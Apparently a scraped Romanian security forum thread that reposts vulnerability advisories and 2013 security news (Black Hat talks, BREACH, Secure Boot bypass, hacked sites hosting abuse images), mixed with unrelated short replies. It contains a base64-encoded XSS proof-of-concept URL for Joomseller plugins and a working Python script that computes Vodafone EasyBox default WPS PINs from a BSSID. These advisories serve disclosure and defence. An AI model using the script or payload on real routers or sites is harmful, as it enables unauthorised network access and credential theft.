Matt

Description : Joomseller Events Booking Pro version 5 and JSE Event versions prior to 1.0.1 suffer from a reflective cross site scripting vulnerability. Author : Carlos Gaston Traberg Source : Joomseller Events Booking Pro / JSE Event Cross Site Scripting ? Packet Storm Code : ---------------------------------------------------------------------------------------------- Joomseller "Events Booking Pro" and "JSE Event" reflected XSS ---------------------------------------------------------------------------------------------- [+] Software Link: http://www.joomseller.com/joomla-components/jse-event.html [+] Affected Versions: Component com_events_booking_v5 Component com_jse_event < 1.0.1 [+] Vulnerability Description: The vulnerable files are the following: .- For JSE Event: /modules/mod_jse_mini_calendar/tmpl/tootip.php .-For Events Booking pro: /modules/mod_eb_v5_mini_calendar/tmpl/tootip.php The "info" parameter is not correctly sanitized before being used, allowing an attacker to perform XSS attacks. As a proof of concept, an attacker could perform the following request: http://example.com/modules/mod_eb_v5_mini_calendar/tmpl/tootip.php?info=eyJldmVudHMiOiIoMTU6MDA6MDApIDxzY3JpcHQ%2BYWxlcnQoMSk7PC9zY3JpcHQ%2BIiwgImV2ZW50X2lkIjoiNjQiLCAiaXRlbWlkIjoiMSIsICJldnJfaWQiOiIxMTkxIn0%3D where the contents of the info parameter is the following payload encoded using base64 encoding {"events":"(15:00:00) <script>alert(1);</script>", "event_id":"64", "itemid":"1", "evr_id":"1191"} [+] Solution: Upgrade to JSE Event version 1.0.1. [+] Report Timeline: [30/07/2013] - Vulnerability reported to the vendor [30/07/2013] - Developer confirm vulnerability and update released [05/08/2013] - Public disclosure [+] Credits: Vulnerability discovered by Gaston Traberg.

Description : Vodafone EasyBox versions 802 and 803 suffer from a default WPS PIN algorithm weakness. The algorithm that generates the default WPS-PIN is entirely based on the MAC address (=BSSID) and serial number of the device. The serial number can be derived from the MAC address. Author : S. Viehbock Source : Vodafone EasyBox Default WPS PIN Algorithm Weakness ? Packet Storm Code : SEC Consult Vulnerability Lab Security Advisory < 20130805-0 > ======================================================================= title: Vodafone EasyBox Default WPS PIN Algorithm Weakness product: EasyBox 802 & EasyBox 803 vulnerable version: EasyBox 802 - all versions EasyBox 803 - Production date before August 2011 fixed version: EasyBox 802 - no vendor patch available EasyBox 803 - Production date after August 2011 impact: Critical homepage: http://www.vodafone.de found: 2012-12-01 by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be accessed with the default WPS PIN (PIN External Registrar) printed on the back of the device. Vulnerability overview/description: ----------------------------------- The algorithm that generates the default WPS-PIN is entirely based on the MAC address (=BSSID) and serial number of the device. The serial number can be derived from the MAC address. An unauthenticated attacker within the range of the access point can capture the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN for it. This PIN can then be used to retrieve the current access point configuration (including the WPA passphrase) or to change the configuration (SSID, encryption method, passphrase, ...) of the access point. An attacker can afterwards connect to the access point and perform malicious activities such as Man-in-the-middle attacks using ARP spoofing, attack clients on the internal network, etc. Proof of concept: ----------------- A script that implements the derivation algorithm has been developed: #!/usr/bin/env python import sys, re def gen_pin (mac_str, sn): mac_int = [int(x, 16) for x in mac_str] sn_int = [0]*5+[int(x) for x in sn[5:]] hpin = [0] * 7 k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF hpin[0] = k1 ^ sn_int[9]; hpin[1] = k1 ^ sn_int[8]; hpin[2] = k2 ^ mac_int[9]; hpin[3] = k2 ^ mac_int[10]; hpin[4] = mac_int[10] ^ sn_int[9]; hpin[5] = mac_int[11] ^ sn_int[8]; hpin[6] = k1 ^ sn_int[7]; pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000 # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc accum = 0 t = pin while (t): accum += 3 * (t % 10) t /= 10 accum += t % 10 t /= 10 return '%i%i' % (pin, (10 - accum % 10) % 10) def main(): if len(sys.argv) != 2: sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n') mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1]) if len(mac_str) != 12: sys.exit('check MAC format!\n') sn = 'R----%05i' % int(mac_str[8:12], 16) print 'derived serial number:', sn print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9]) print 'WPS pin:', gen_pin(mac_str, sn) if __name__ == "__main__": main() Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803, both produced by Arcadyan/Astoria Networks. Other devices of this vendor (including EasyBox 903) might be affected as well. Vodafone did not provide any information on this. According to Vodafone / CERT-Bund, the following devices are vulnerable: EasyBox 802 - all versions EasyBox 803 - production date before August 2011 Vendor contact timeline: ------------------------ 2012-12-14: Contacting Vodafone via customer support. 2013-01-09: Vodafone refers to datenschutz@vodafone.com. 2013-01-10: Requesting encryption keys. 2013-01-14: Vodafone provides encryption keys. 2013-01-15: Sending advisory and proof of concept exploit via encrypted channel. 2013-01-25: Sending reminder regarding SEC Consult disclosure policy. 2013-01-25: Automatic response: Out of office until 2013-02-24. 2013-01-25: Requesting new contact person from CSIRT-DE@vodafone.com and DU-DE-ZV-MXL-CSIRT-DE@vodafone.com. 2013-01-28: Vodafone acknowledges receipt of advisory. 2013-02-05: Vodafone confirms validity of provided information, gives information about some newer devices which are not affected, mentions that customers have already been notified to change "default passwords" (no details given). 2013-02-21: Requesting information regarding affected products/product versions, clarification regarding "default passwords", URLs/communication channels used for mentioned notifications, ways for identifying vulnerable devices (end users), ... 2013-03-13: Still no response - sending deadline dates 2013-05-29: Contacting German CERT-Bund for further coordination in order to warn end users 2013-08-05: Coordinated release of advisory with German CERT-Bund Solution: --------- Vodafone does not provide a solution for the affected devices. Workaround: ----------- Either change the WPS PIN or disable WPS entirely. SEC Consult could not confirm if WPS actually is disabled (as opposed to just not being advertised), so both changing the PIN and disabling WPS is recommended. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan Viehböck / @2013

(CNN) -- If something can connect to a network, it can be hacked. Computers and phones are still popular targets, but increasingly so are cars, home security systems, TVs and even oil refineries. That was the message at this year's Black Hat and DefCon computer security conferences, which took place last week in Las Vegas. The annual conferences draw a mix of computer researchers and hackers who present the latest bugs and vulnerabilities they've discovered. It's a combination of public service, business and sport. These are some of the more popular targets covered at this year's conferences. By drawing attention to them, the "white-hat" hackers hope to encourage greater security from the various manufacturers and industries, and more vigilance from consumers. Typically, the presenters inform manufacturers of bugs ahead of their talks so the companies can fix the issues before they are exploited by criminals. Remote-controlled cars Someone hacking your computer can be an inconvenience. Someone hacking your car can be deadly. A pair of presentations on hacking cars kicked off the DefCon conference on Friday. Australian hacker Zoz outlined the security issues fully autonomous cars will face and said car-hacking is inevitable. Autonomous vehicles like cars and drones are essentially robots, and they rely on sensors to operate. He said a hacker could theoretically take complete control of a car over wireless networks or trick its various sensors into feeding a motorist false information about location, speed and the proximity of other cars or objects. Fully driverless cars are still a few years away, but computerized systems are common in vehicles on the road today. Electronic control units can control a range of car functions, including braking, accelerating and steering. They manage security features, in-car displays and even seat belts. Researchers Charlie Miller and Chris Valasek, funded by a grant from the U.S. military's DARPA, looked into what kind of damage hackers could do to a car by taking control of a Toyota Prius and a Ford Escape. To access the systems, they had to physically connect a computer to the cars through a diagnostics port. They wrote custom software that let them hijack the cars' systems. Once in control, they disabled brakes, changed the display to show incorrect speed or gas levels, and messed with the steering and seat belts. They were able to kill the engine and toy with with less consequential features like the car's horn and lights. Toyota played down the wired demonstration and said it is focusing on security measures to prevent wireless attacks. Compromising smartphones Attacks on personal computers used to be the bread and butter of cybercriminals, spawning a lucrative industry of black-market malware and the anti-virus programs that fight them. The next big target is smartphones. Mobile devices are not impervious to attacks, even though walled-off app stores have kept much of the malware at bay. Kevin McNamee demonstrated how a piece of malware could turn an Android smartphone into a "spy phone" that remotely monitors its owner, sending information on the location, communications and content, like photos, back to a third party. The hack isn't new, but McNamee managed to inject the malicious code into popular apps like "Angry Birds." Once it was installed, the user would have no idea that their phone was acting as a remote surveillance device. Verizon "femtocells" -- small boxes used to extend cell service -- were hacked by security researchers at iSEC Partners to intercept calls and any other data sent over cellular networks like texts, images and browsing history. The wireless carrier issued a fix for all its femtocells, but researchers say other networks could still have the same issue. With $45 in hardware, researchers Billy Lau, Yeongjin Jang and Chengyu Song turned an innocent-looking iPhone charger into a tool for gathering information such as passcodes, e-mails and other communications, and location data directly from the smartphone. Apple thanked the researchers and said it is deploying a fix for the bug in its iOS 7 software update, which comes out this year. The too-smart home Thanks to cheap, low-power sensors, anything in your house can become a "smart" device, helpfully connecting to the Internet so you can control it from a computer or smartphone. Smart home security devices have the potential to cause the most damage if hacked, and two separate demonstrations showed how to break in by opening "smart" front-door locks. Another unsettling trend at the conferences was spying on unwitting people through their own cameras. Home security cameras could be disabled by someone who wanted to break in, or they could be turned into remote surveillance devices. One researcher showed how she easily took over the camera stream on a child's toy from a computer. Researchers Aaron Grattafiori and Josh Yavor found bugs in the 2012 model of the Samsung Smart TV that allowed them to turn on and watch video from the set's camera. Samsung said it had released a software update to fix the issue. (Many security experts suggest placing a piece of tape over any cameras you don't want surreptitiously watching you, just to be safe.) Hackers get personal Even in the wake of this year's NSA revelations, a homemade surveillance device that sniffs out pieces of data from your various computing devices, even when they're not online, is disturbing. Brendan O'Connor, who runs a security firm and is finishing a law degree, has created such a device, dubbed CreepyDOL (DOL stands for Distributed Object Locator; "Creepy" is self-explanatory). The device cost $57 to make and consists of a Raspberry Pi computer, a USB hub, two WiFi connections, an SD card and USB power inside an nondescript black case. Computers and phones act as tracking devices and leak information constantly, according to O'Connor. When plugged in, CreepyDOL detects nearby phones and computers and uses them to track people's location and patterns, figuring out who they are, where they go and what they do online. To demonstrate the device without breaking any laws, O'Connor showed his own information as sniffed out by one of the devices. Using a gaming engine and Open Street Maps, he hovered over his dot on a map. It brought up his name, e-mail address, a photo, the dating website he used, details about his devices and the locations he visited in town. In a worst-case scenario, as imagined by O'Connor, a miscreant could plug in one of the devices under any Starbucks near a capital building to pick up the scent of a state senator and wait for them to do something compromising. "You find somebody with power and exploit them," said O'Connor. The creation is remarkable for how simple it is. It's likely others have similar knowledge and setups that exploit the same security flaws in applications, websites, devices and networks. Industrial facilities The most frightening targets highlighted at the conference were the opposite of personal. Critical infrastructure such as oil and gas pipelines or water treatment plants are potential targets for hackers. Many industries are controlled with supervisory control and data acquisition, or SCADA, systems. The systems are older, installed at a time when people weren't concerned about cyberattacks, and connect to the Internet over an unsecured network protocol. The reason the systems are online in the first place is so that they're easier to monitor. Some, like oil pipelines, are often in remote locations. Multiple demonstrations at the conferences showed just how simple it is to hack energy systems. Researchers Brian Meixell and Eric Forner staged a mock hack of an oil well using pumps and a liquid container filled with teal liquid. They got into the system, turned the pumps on and off and overflowed the containers by feeding the system false data. If it happened on an actual oil well, the hack could result in an environmental catastrophe, according to the researchers. It's possible to shut down an entire industrial facility from 40 miles away using a radio transmitter, according to researchers Carlos Penagos and Lucas Apa. They demonstrated injecting fake measurements, causing the device that received them to behave differently. For example, someone could trigger a water tank to overflow by faking an abnormally high temperature. The industries and U.S. government are aware that industrial systems are vulnerable, but their remoteness and age make upgrading difficult and expensive. There is no built-in system for releasing software patches, like there is with personal computers. Sursa CNN.COM

The mysterious death of a San Francisco "ethical hacker," who was set to give a speech on infiltrating wireless implantable medical devices, has caused speculation that he was the victim of a targeted attack, and raised alarm about the safety of devices such as pacemakers. Professional hacker Barnaby Jack, who famously demonstrated how to make ATMs spit out cash, was set to reveal the secrets of how implantable medical devices, specifically pacemakers, can be hacked, in a talk scheduled for last Thursday at the Black Hat security conference in Las Vegas. "He was able to remotely exploit them, and this talk was really dedicated to how the manufacturers could improve the security of the device," IOactive CEO Jennifer Steffens said. But his girlfriend found the 35-year-old dead in his San Francisco home July 25. The cause of death is still under investigation, according to the San Francisco coroner's office. Police say they have ruled out foul play, but the cause of death might not be determined by the medical examiner for another month. Jack dedicated his career to exposing the vulnerabilities hackers can exploit. The title of his scheduled talk at the Black Hat security conference was "Implantable Medical Devices: Hacking Humans," and he planned to discuss how these devices "operate and communicate, and the security shortcomings of the current protocols," according to the Black Hat website. "He wanted to know, how could that stuff down there fail, and especially how it could fail if there were some not nice people out there trying to make it crash," security researcher Dan Kaminsky said. Jack's research into the possibility of hacking medical devices is reminiscent of the plot twist in the end of the second season of the Emmy-award winning series "Homeland," in which the fictional vice president was killed when his pacemaker was hacked by terrorists. That scene got people wondering whether it is possible to hack implantable medical devices. In an interview with Bloomberg News before his death, Jack said that the answer is yes. "Once I took a look, I was actually shocked to see how many vulnerabilities existed," Jack said. The FDA said in a statement that there is no cause for alarm for the nearly 3 million Americans who have pacemakers. "[The FDA] is not aware of any patient injuries or deaths associated with these incidents, nor do we have any indication that any specific devices or systems in clinical use have been purposely targeted at this time," the regulatory agency said. Meanwhile, questions -- and even conspiracy theories -- are swirling around the Web regarding Jacks' untimely death, with some even blaming the U.S. government. "This is an industry where a lot of money and danger is at stake," ABC News consultant and former FBI Agent Brad Garrett said. "The work he was doing certainly put him at some risk," ABC News consultant and former FBI Agent Brad Garrett said. Mai jos aveti link si catre video : http://abcnews.go.com/GMA/video/hacker-barnaby-jack-found-dead-revealing-pacemaker-hacking-19869873 Sursa AbcNews.go.com

Ar fi ok sa fie lasat si numele adica nickname-ul de pe forum, poate noi, restul de pe forum avem idei, sugestii catre respectivul si putem ajuta.

Acum e mult mai detaliat.

Introductory presentation While still reviewing the instrument-based theory, there was a slight allusion at some point that oftentimes from practical reasons the gravity of acts occurring in the international medium is divided into various standards—a sign self-evidently speaking in favour of consequences criteria over the instrument one. A bright example accounting for that inclination one could derive from the Nicaragua case where ICJ established that it is “necessary to distinguish the most grave forms of the use of force (armed attacks) from other less grave forms” (Nicaragua case, 1986, par. 191), like a “mere frontier incident“. Assessment for possible differences between acts in terms of gravity should be based on the “scale and effects” of the force used by the aggressor. Confirming the initial point made, Michael Schmitt, the Chairman of International Law Department at the United States Naval War College and most prominent proponent of the consequence-based scheme, opines that : Presumably, this ‘golden’ standard seeks to encompass acts that inflict grave consequences likely to produce death/injury to human beings or destruction/damage to tangible objects. Hence, from the perspective of consequence-based approach, every cyber attack that falls within this range of “most grave forms of the use of forms” measured through the magnifying glass of ‘scale and effects’ would be deemed tantamount to ‘armed attack’ in accordance with Article 51 of the UN Charter. Moreover : The Intent Except for the quantitative values conditioned by “scale and effects”, the specific ‘intent’ is as well a precondition which distinguishes between less grave forms of the use of force and armed attacks. On the one hand, it constitutes a valuable indicator of the extent to which the political or military leadership of a state initiating cyber offensive is willing to violate another state’s inherent right of sovereignty and, on the other hand, whether the act is not a deed of cyber terrorists, cyber criminals (i.e. inchoate malware activities), or it is inadvertently launched. Therefore, the availability of exactly determined ‘intent’ would preclude misjudgements where “the accidental spreading of malware” is to be qualified erroneously as “an armed attack based exclusively on the objective ‘scale and effects’ of the accident (Melzer, 2011).” With regard to all said to this point, one scholar draws the following inference: Results-oriented approach It is important to mention that although similar they might seem at first, consequence-based and results-oriented approaches are different. Davis Brown’s “results-oriented methodology” term refers to the work of Ian Brownlie, “International Law and the Use of Force by States” (1963). There Brownlie tried to explore the scope of an act and whether is a use of force by emphasizing on its consequences. For a leading point, he studied the chemical and biological weapons, concluding that they have the same result as the conventional ones—death and injury to civilians and military units. Alike to the chemical, biological, and nuclear technology, cyber technology has a multitude of purposes. On the dark side of the coin, a cyber attack may cause a similar result as: As a final proof, he examines a general denial-of-service attack under the results-oriented approach. By directing enormous amounts of artificially generated requests in order to disturb another computer’s computational resources or network’s bandwidth, the attacker attempts to incapacitate the adversary’s assets and make them inoperative for the intended users. If the attempt is successful, then the technology is as useless as it is struck by kinetic force – Criticism There are doubts based on the belief that Article 49 of Additional Protocol I to Geneva Conventions is not being taken into account and the focus is placed wrongly on the consequences instead of posing the question of whether or not the act is violent by nature as in Article 49. An effective methodology would try to promote the humanitarian principle that aim at less violent acts in favour of more violent ones, while the Brown’s proposed one does not differentiate clearly (Walker, 2009). As to the provided example, the juxtaposition of armed attack and DoS cyber attack would be considered improbable to sustain the result-oriented approach. Although users are deprived from access in this instance, there is no kinetic equivalent of act bearing violent consequences (Walker, 2009). Hence, here comes the logic question: Does a mere denying of computer services would legally warrant recourse to a full-fledged armed attack in self-defence (Article 51 UN Charter)? Using another example, would it be feasible for Estonia after being attacked by a massive DDoS to attack Russia (if the act is positively attributed to their government) with tanks, missiles, or nuclear weapon (if they had one)? Given the customary international law tenets of proportionality and necessity, a negative reply is almost always certain. Violent consequences’ terminology in jus in bello In order to dig deeper into the consequence-based approach, one must also look at the other foundational branch in the international law which regulates conflicts. Jus in bello or the Law of Armed Conflict may shed some light on the versatile character of the word ‘consequences’. Provision of interest: The article to be referred to is again 49 (1) of Additional Protocol I, which provides a short explanation on the term “attacks”, equalizing it with the expression “acts of violence”. To discriminate between cyber attacks that cause mere nuisance or harassment and those that bring forth “human suffering”, Schmitt uses the following articulation: Hence, these “acts of violence” apparently do not necessitate the usage of kinetic violence, as far as the resulting aftermath is equipollent to that associated with kinetic physical violence, namely, death or injury of individuals or physical destruction or damage of objects (Melzer, 2011). As a result of this analysis, there can be concluded that under the consequence-based approach cyber attacks may fulfil the prescriptive requirements of Article 49(1) in the presence of three cumulative preconditions: 1. The consequences are not entailed by isolated, sporadic incidents 2. The consequences are desired and predictable to some extent 3. The consequences are intended to cause death/ injury or destruction/damage (i.e. violent consequences) (Kodar, 2012) Inherent violence or violent nature argument According to one theorist : She admits that these non-violent acts (typing on an ordinary keyboard) can : This type of discourse, however, is rather contentious. Firstly, why we should limit our perspective of inherent violence to the design of the weapon of choice? Why the ‘trigger’ should have, so to say, more inherent violence than the ‘button’? (See the images below) In the end, as children, we all played with toy guns having triggers that do not cause ‘inherent violence. N-am stiut in ce categorie sa il pun asa ca l-am bagat la "Stiri" deoarece mi s-a parut foarte interesant ce e scris in el. Sursa Resources.InfosecInstitute.com

The Australian Communications Consumer Action Network (ACCAN), Blind Citizens Australia, Media Access Australia, Able Australia and the Australian Deafblind Council have banded together to campaign for the demise of the CAPTCHA. CAPTCHAs, or Completely Automated Public Turing test to tell Computers and Humans Apart, ask users to prove they are human by entering text that has deliberately been obscured. The resulting squiggles are often frustrating for able-bodied folks, never mind those with less-than-stellar hearing or sight. So frustrating, in fact, that ACCAN CEO Teresa Corbin thinks “CAPTCHAs fundamentally fail to properly recognise people with disability as human,” which obviously isn't on. After some prodding from Vulture South on why the campaign does not offer guidance to developers on how best to provide strong verification without hampering accessibility (we dislike campaigns that don't offer solutions), ACANN suggested its preferred alternative is a “did you really just register for this?” email bearing an activation link. Interestingly, that method is not one mentioned by the W3C's Inaccessibility of CAPTCHA: Alternatives to Visual Turing Tests on the Web document from 2005. But an ACANN spokesperson said such emails are “a very common and accessible alternative”. Developers in the audience can feel free to argue otherwise by making a comment. ® Sursa TheRegister.co.uk

Innocent companies' websites are being hacked to serve images of child sex abuse, the Internet Watch Foundation has warned. The charity said that, in the past six weeks, it has received 227 reports of netizens being directed from completely legal online porno sites to web pages on a second server containing illegal material. Typically, someone visiting a normal adult porn website is redirected to, say, a file directory listing in a furniture shop's online home, which has been compromised and filled with images of terrible abuse. Such trickery - stashing highly illegal content on an innocent organisation's servers - makes a mockery of the UK government's attempts to filter out what it determines to be the murkier corners of the internet, and also puts visitors and site owners in legal danger: the defence "but I didn't know!" is not guaranteed to succeed if the unlucky netizen is subsequently charged with possession and making of indecent images. “We hadn’t seen significant numbers of hacked websites for around two years, and then suddenly in June we started seeing this happening more and more," the foundation's technical researcher Sarah Smith said in a statement. “It shows how someone, not looking for child sexual abuse images, can stumble across it. The original adult content the internet user is viewing is far removed from anything related to young people or children." The charity - which acts as a hotline for reports of online child abuse - described the illegal content as some of worst of its kind, and said people had been very distressed by what they'd seen. Surfers leafing through legal XXX sites click on an image or video there and be redirected to a folder containing the images on the hacked site, which might be a furniture store or other unrelated business site. Neither the administrators of the adult site nor those of the hacked site would be aware that the link and folder existed, IWF said. "Our reporters have been extremely diligent in explaining exactly what happened, enabling our analysts to re-trace their steps and take action against the child sexual abuse images," Smith said. “Since identifying this trend we’ve been tracking it and feeding into police forces and our sister hotlines abroad." The foundation said that in all cases it had been able to get the sick material removed. ® Sursa TheRegister.co.uk Stirea in limba romana http://smartnews.ro/internet/17031.html

A gap in the adoption of the IPv6 protocol could be leaving users prone to attack, researchers have warned. Security firm Neohapsis is warning that the protocol, which has been undergoing a rollout over the last several years, could be subject to a unique attack that redirects users to unwanted potentially malicious pages. Dubbed an SLAAC attack, the operation takes advantage of the client-side rollout of IPv6 and the built-in preference such systems have for the new protocol. “Modern operating systems, such as Windows 8 and Mac OS X, come out of the box ready and willing to use IPv6, but most networks still have only IPv4,” explained Neohapsis researchers Brent Bandelgar and Scott Behrens. “This is a problem because the administrators of those networks may not be expecting any IPv6 activity and only have IPv4 monitoring and defences in place.” The researchers went on to describe a scenario in which the attacker finds an IPv4 connection and sets up a server or network impersonating an IPv6 alternative. When users attempt to load the intended site, their systems could, by default, select the imposter network instead, sending their traffic through the attacker's systems. “They could pretend to be an IPv6 router on your network and see all your web traffic, including data being sent to and from your machine,” the researchers said. “Even more lethal, the attacker could modify web pages to launch client-side attacks, meaning they could create fake websites that look like the ones you are trying to access, but send all data you enter back to the attacker (such as your username and password or credit card number).” While such attacks could be mitigated by disabling IPv6 on newer systems, Neohapsis believes that the more practical and effective solution for the long term is to encourage companies and network operators to speed up their adoption of the IPv6 protocol. Sursa V3.co.uk

Abonat la "Newsletter".

E un fel de mancare.

Citeste regulamentul.

Omul a zis clar ca designul e cum e .. deci comentati asupra continutului.

Proiectul arata bine insa culorile alea sunt chiar ciudate..

Felicitari insa tie iti place cum arata?

The Windows 8 Secure Boot mechanism can be bypassed on PCs from certain manufacturers because of oversights in how those vendors implemented the Unified Extensible Firmware Interface (UEFI) specification, according to a team of security researchers. The researchers Andrew Furtak, Oleksandr Bazhaniuk and Yuriy Bulygin demonstrated Wednesday at the Black Hat USA security conference in Las Vegas two attacks that bypassed Secure Boot in order to install a UEFI bootkit -- boot rootkit -- on affected computers. Secure Boot is a feature of the UEFI specification that only allows software components with trusted digital signatures to be loaded during the boot sequence. It was designed specifically to prevent malware like bootkits from compromising the boot process. According to the researchers, the exploits demonstrated at Black Hat are possible not because of vulnerabilities in Secure Boot itself, but because of UEFI implementation errors made by platform vendors. The first exploit works because certain vendors do not properly protect their firmware, allowing an attacker to modify the code responsible for enforcing Secure Boot, said Bulygin who works at McAfee. The exploit is designed to modify the platform key -- the root key at the core of all Secure Boot signature checks -- but in order to work it needs to be executed in kernel mode, the most privileged part of the operating system. This somewhat limits the attack because a remote attacker would first have to find a way to execute code in kernel mode on the targeted computer. The researchers demonstrated their kernel-mode exploit on an Asus VivoBook Q200E laptop, but some Asus desktop motherboards are also affected according to Bulygin. Asus released BIOS updates for some motherboards, but not for the VivoBook laptop, the researcher said. He believes that more VivoBook models might be vulnerable. Asus did not respond to a request for comment sent Thursday. The second exploit demonstrated by the researchers can run in user mode, which means that an attacker would only need to gain code execution rights on the system by exploiting a vulnerability in a regular application like Java, Adobe Flash, Microsoft Office or others. The researchers declined to reveal any technical details about the second exploit or to name the vendors whose products are affected by it because the targeted vulnerability was discovered recently. The issue that makes the kernel-mode exploit possible was discovered and reported to the affected platform vendors over a year ago, Bulygin said. At some point, after enough time has passed, the public needs to know about it, he said. Several other issues that can be used to bypass Secure Boot have also been identified and their disclosure is being coordinated with Microsoft and the UEFI Forum, the industry standard body that manages the UEFI specification, Bulygin said. "Microsoft is working with partners to help ensure that secure boot delivers a great security experience for our customers," Microsoft said Thursday in an emailed statement. Despite these vendor implementation problems, Secure Boot is still a huge step forward, Bulygin said. To install bootkits now, attackers first need to find a vulnerability that would allow them to bypass Secure Boot, while on legacy platforms there was nothing to stop them, he said. Sursa ComputerWorld.Com

Black Hat 2013 A new hacking technique dubbed BREACH can extract login tokens, session ID numbers and other sensitive information from SSL/TLS encrypted web traffic, say researchers. Secret data crucial to securing online banking and shopping can be lifted from an HTTPS channel in as little as 30 seconds, we're told. BREACH (short for Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) attacks the common Deflate data compression algorithm used to save bandwidth in web communications. The exploit is a development of the earlier Compression Ratio Info-leak Made Easy (CRIME) exploit, which also involved turning compression of encrypted web requests against users. The code-breaking research behind BREACH was unveiled by security researchers Angelo Prado, Neal Harris and Yoel Gluck during a presentation at the Black Hat hacking conference in Las Vegas on Thursday. All versions of TLS/SSL are at risk from BREACH regardless of the encryption algorithm or cipher that's in play, the trio said. The attacker just has to continually eavesdrop on the encrypted traffic between a victim and a web server before tricking marks into visiting a website under the miscreant's control. The attacker's booby-trapped website hosts a script that runs the second phase of the attack: this forces the victim's browser to visit the targeted website thousands of times, over and over, each time appending a different combination of extra data. When the attacker-controlled bytes match any bytes originally encrypted in the stream, the browser's compression kicks in and reduces the size of the transmission, a subtle change the eavesdropper can detect. This data leakage - a type of Oracle attack - means an eavesdropper can gradually piece together an email address or security token in a HTTPS exchange, byte by byte, using a technique akin to a high-tech game of Battleships. The time needed to perform a successful attack, and how many requests need to be sent, is dependant of the size of the secret information attackers are targeting, Ars Technica notes. The leaked data provides enough clues to decrypt a user's supposedly protected cookies or other targeted content. The recovery of secret authentication cookies open the door for attackers to pose as their victims and hijack authenticated web sessions, among other attacks, the British Computer Society (BCS) notes in a blog post. The practical upshot is that tokens and other sensitive information sent over SSL connections could be lifted even though the encrypted contents of emails and one-off orders sent to e-commerce websites are beyond the scope of the attack. Prado, Harris and Gluck released tools to test whether websites are vulnerable to BREACH, as well as techniques to defend against the exploit during their presentation at Black Hat. Not so lucky BREACH is the latest in a growing list of attacks against HTTPS encryption, the internet's gold standard for secure communication, following attacks such as CRIME, BEAST, Lucky 13 and others. During a debate at Black Hat, security researchers expressed fears that over the medium term algorithms such as RSA and Diffie-Hellman will be weakened or broken as a result of advances in crypto-analysis as well as the development of attacks such as BREACH. “There’s a small, but definite chance that RSA and non-ECC Diffie-Hellman will not be usable for security purposes within two to five years,” said Alex Stamos of Artemis Internet, a division of iSEC Partners. “We’re not saying this is definite," he added. Kaspersky Lab's Threatpost blog has more on the debate here. Stamos is not alone in looking forward towards the end of life of cryptographic tools and techniques that have served us well but are increasing showing their age. The RSA algorithm is about to turn 40, for example. Adi Shamir (the S in RSA) urged security researchers to think about post-cryptography security during a debate at the RSA Conference cryptographers' panel session back in March. ® Sursa TheRegister.co.uk

Dozens of businesses have been hacked and their computer servers used to host images of child sexual abuse, the Internet Watch Foundation has said. The charity said legal pornographic sites had also been attacked to redirect users to the illegal material. The offending material was sometimes accompanied by malware, it said. The IWF told BBC Radio 5 live it had received 227 reports about the trend over the past six weeks. Some complaints involved the same examples. Hijacked links Cambridge-based IWF described the images as showing "the worst of the worst" sexual abuse. They included images of newborn babies and the rape and violent sexual abuse of very young children, it said. The charity gave the example of one case in which a furniture business had had the servers it used breached. It said the attackers had created an "orphan folder" on the computers and then uploaded hundreds of offending images to it - effectively creating a new section on the retailer's website which was not linked to any of its other pages. Continue reading the main story “ Start Quote We hadn't seen significant numbers of hacked websites for around two years, and then suddenly in June we started seeing this happening more and more” Sarah Smith IWF The charity said the hackers then hijacked links on "adult" sites so that if a visitor clicked on one of the affected pornographic images or videos they would be directed to the offending material. "We don't understand this entirely," said IWF chairman Sir Richard Tilt. "But some company websites have been hacked into and some of this appalling material has been placed there." The charity said more than two dozen businesses across the world had had the servers they used compromised, in addition to the furniture seller. Jim Gamble, the former head of the Child Exploitation and Online Protection agency (Ceop), said: "These people will go to great lengths to hide who they are and to distribute to their network. "That's why I was deeply concerned when people were presenting the search initiative from the prime minister's office as a solution to child protection. "These people aren't going online and hitting child abuse images in a one click search. They're going through these very extended security measures, they're hiding and sharing within specific groups. "We have to get to the back end of this, the root cause, which is people. That's got to be an investment in law enforcement." Administrators of the sites involved might be unaware of the problem until someone complained, the charity said. The IWF said it did not know what had motivated the perpetrators. "We hadn't seen significant numbers of hacked websites for around two years, and then suddenly in June we started seeing this happening more and more," said the IWF's technical researcher, Sarah Smith. "It shows how someone not looking for child sexual abuse images can stumble across it. The original adult content the internet user is viewing is far removed from anything related to young people or children. "We've received reports from people distressed about what they've seen. Our reporters have been extremely diligent in explaining exactly what happened, enabling our analysts to retrace their steps and take action against the child sexual abuse images." She added that the charity had passed on the information to the police and sister hotlines in other countries. Children's charity the NSPCC urged anyone coming across abuse images to report them immediately, saying "something like 16% of men in particular" were failing to do so. "We really encourage them to report it because potentially you'll then have a thumbnail of that image somewhere hidden in your computer system even if you only clicked on it for one second," said spokeswoman Claire Lilley. Rise in reports The issue of online images showing the sexual abuse of children has made headlines in recent months after the convictions of Stuart Hazell and Mark 